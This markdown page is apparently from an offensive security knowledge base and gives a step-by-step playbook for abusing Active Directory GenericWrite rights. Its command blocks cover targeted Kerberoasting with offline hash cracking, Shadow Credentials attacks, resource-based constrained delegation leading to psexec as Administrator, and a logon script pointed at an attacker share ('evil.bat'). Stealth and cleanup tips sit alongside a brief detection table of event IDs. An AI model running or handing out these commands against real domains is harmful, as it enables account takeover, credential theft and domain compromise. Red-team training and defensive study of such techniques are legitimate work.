attack-20-genericwrite-abuse.md (7728B)
1 --- 2 title: "Attack #20 β GenericWrite Abuse" 3 description: "GenericWrite allows an attacker to write to any non-protected attribute on a target AD object. While it doesn't grant full control like GenericAll, itβ¦" 4 category: active-directory 5 subcategory: "ACL Abuse" 6 tags: ["active-directory", "kerberos", "hashing"] 7 tools: ["Rubeus", "Certipy", "Hashcat", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/π‘ Attack #20 β GenericWrite Abuse.md" 11 --- 12 # π‘ Attack #20 β GenericWrite Abuse 13 14 *** 15 16 ## π How It Works 17 18 GenericWrite allows an attacker to **write to any non-protected attribute** on a target AD object. While it doesn't grant full control like GenericAll, it enables several powerful exploitation paths: **Targeted Kerberoasting** (set an SPN on a user, roast their hash), **Shadow Credentials** (write to `msDS-KeyCredentialLink` for passwordless auth), **logon script modification**, and **RBCD configuration** (write to `msDS-AllowedToActOnBehalfOfOtherIdentity` on computers). 19 20 ### Exploitation Methods by Target Type 21 22 | Target Type | Method | What You Write | Result | 23 |---|---|---|---| 24 | **User** | Targeted Kerberoasting | `servicePrincipalName` | Crack their hash offline | 25 | **User** | Shadow Credentials | `msDS-KeyCredentialLink` | Auth as target via PKINIT | 26 | **User** | Logon Script | `scriptPath` | Code execution on next logon | 27 | **Computer** | RBCD | `msDS-AllowedToActOnBehalfOfOtherIdentity` | Impersonate any user to that host | 28 | **Computer** | Shadow Credentials | `msDS-KeyCredentialLink` | Auth as that computer | 29 | **Group** | β Cannot add members | N/A | GenericWrite β WriteMembers for groups | 30 31 *** 32 33 ## βοΈ Prerequisites 34 35 | Requirement | Detail | 36 |---|---| 37 | **GenericWrite ACE on target** | Must exist in the target object's DACL | 38 | **Domain user account** | Any authenticated domain user | 39 40 *** 41 42 ## π οΈ Tools 43 44 | Tool | Platform | Notes | 45 |---|---|---| 46 | **PowerView** | Windows | `Set-DomainObject` for attribute manipulation | 47 | **Whisker** | Windows | Shadow Credentials exploitation | 48 | **pyWhisker** | Linux | Python Shadow Credentials tool | 49 | **Certipy** | Linux | `shadow auto` for automated Shadow Creds | 50 | **Rubeus** | Windows | Kerberoasting, PKINIT auth | 51 | **bloodyAD** | Linux | All-in-one AD exploitation | 52 53 *** 54 55 ## π» Full Commands 56 57 ### π΄ Method 1 β Targeted Kerberoasting 58 59 ```powershell 60 # ββ Set SPN on target user ββββββββββββββββββββββββββββββββββββββββββββββββββββ 61 Set-DomainObject -Identity targetadmin -Set @{serviceprincipalname='fake/kerberoast'} 62 63 # ββ Roast the hash ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 64 .\Rubeus.exe kerberoast /user:targetadmin /outfile:roast.txt 65 66 # ββ Crack offline βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 67 hashcat -m 13100 roast.txt rockyou.txt --force 68 69 # ββ Clean up β remove the SPN ββββββββββββββββββββββββββββββββββββββββββββββββ 70 Set-DomainObject -Identity targetadmin -Clear serviceprincipalname 71 ``` 72 73 ```bash 74 # ββ Linux β targeted kerberoasting ββββββββββββββββββββββββββββββββββββββββββββ 75 # Set SPN via bloodyAD 76 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 77 set object targetadmin servicePrincipalName -v 'fake/kerberoast' 78 79 # Roast 80 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 81 -request-user targetadmin -outputfile roast.txt 82 83 # Clean up 84 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 85 set object targetadmin servicePrincipalName 86 ``` 87 88 ### π΄ Method 2 β Shadow Credentials 89 90 ```powershell 91 # ββ Whisker β add shadow credential to target user βββββββββββββββββββββββββββ 92 .\Whisker.exe add /target:targetadmin /domain:corp.local /dc:DC01.corp.local 93 # Outputs a Rubeus command to request TGT with the new key credential 94 95 # Run the outputted Rubeus command to get a TGT as targetadmin 96 ``` 97 98 ```bash 99 # ββ pyWhisker βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 100 python3 pywhisker.py -d corp.local -u low_user -p 'Password1' \ 101 --target targetadmin --action add --dc-ip 10.10.10.10 102 103 # ββ Certipy shadow auto (easiest) ββββββββββββββββββββββββββββββββββββββββββββ 104 certipy shadow auto -u low_user@corp.local -p 'Password1' \ 105 -account targetadmin -dc-ip 10.10.10.10 -dc-host dc01.corp.local 106 # Outputs: NT hash and TGT for targetadmin 107 ``` 108 109 ### π΄ Method 3 β RBCD (on Computer objects) 110 111 ```bash 112 # ββ Configure RBCD on target computer βββββββββββββββββββββββββββββββββββββββββ 113 addcomputer.py -computer-name 'FAKE$' -computer-pass 'Pass123!' \ 114 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 115 116 rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' \ 117 -action write -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 118 119 getST.py -spn cifs/TARGET.corp.local -impersonate Administrator \ 120 -dc-ip 10.10.10.10 corp.local/'FAKE$':'Pass123!' 121 122 export KRB5CCNAME=Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache 123 psexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local 124 ``` 125 126 ### π΄ Method 4 β Logon Script Modification 127 128 ```powershell 129 # ββ Set malicious logon script path βββββββββββββββββββββββββββββββββββββββββββ 130 Set-DomainObject -Identity targetadmin -Set @{scriptpath='\\ATTACKER\share\evil.bat'} 131 # Next time targetadmin logs in, evil.bat executes in their context 132 ``` 133 134 *** 135 136 ## π― OPSEC Tips 137 138 - **Shadow Credentials is the stealthiest method** β original password unchanged, persistent access 139 - **Targeted Kerberoasting requires cleanup** β always remove the SPN after getting the hash 140 - **GenericWrite on groups does NOT let you add members** β you need WriteMembers or GenericAll for that 141 - **Monitor Event 5136** for all methods β it catches attribute modifications 142 143 *** 144 145 ## π‘οΈ Detection β Event IDs 146 147 | Event ID | Source | What to Look For | 148 |---|---|---| 149 | **5136** | Security Log (DC) | Attribute modification: `servicePrincipalName`, `msDS-KeyCredentialLink`, `scriptPath`, `msDS-AllowedToActOnBehalfOfOtherIdentity` | 150 | **4738** | Security Log (DC) | User account changed β SPN modification | 151 | **4741** | Security Log (DC) | Computer account created (RBCD path) | 152 153 *** 154 155 ## π Attack Chain Context 156 157 ``` 158 [GenericWrite] βββ Multiple Escalation Paths 159 β 160 ββββ π« Targeted Kerberoasting β crack password β impersonate user 161 ββββ π Shadow Credentials β passwordless auth as target 162 ββββ π» RBCD on computers β impersonate DA to that host 163 ββββ π Logon script β code execution on target's next logon 164 ββββ π Defeated by: ACL auditing, monitor 5136, least privilege 165 ``` 166 167 *** 168 169 > β **Attack #20 β GenericWrite Abuse complete.**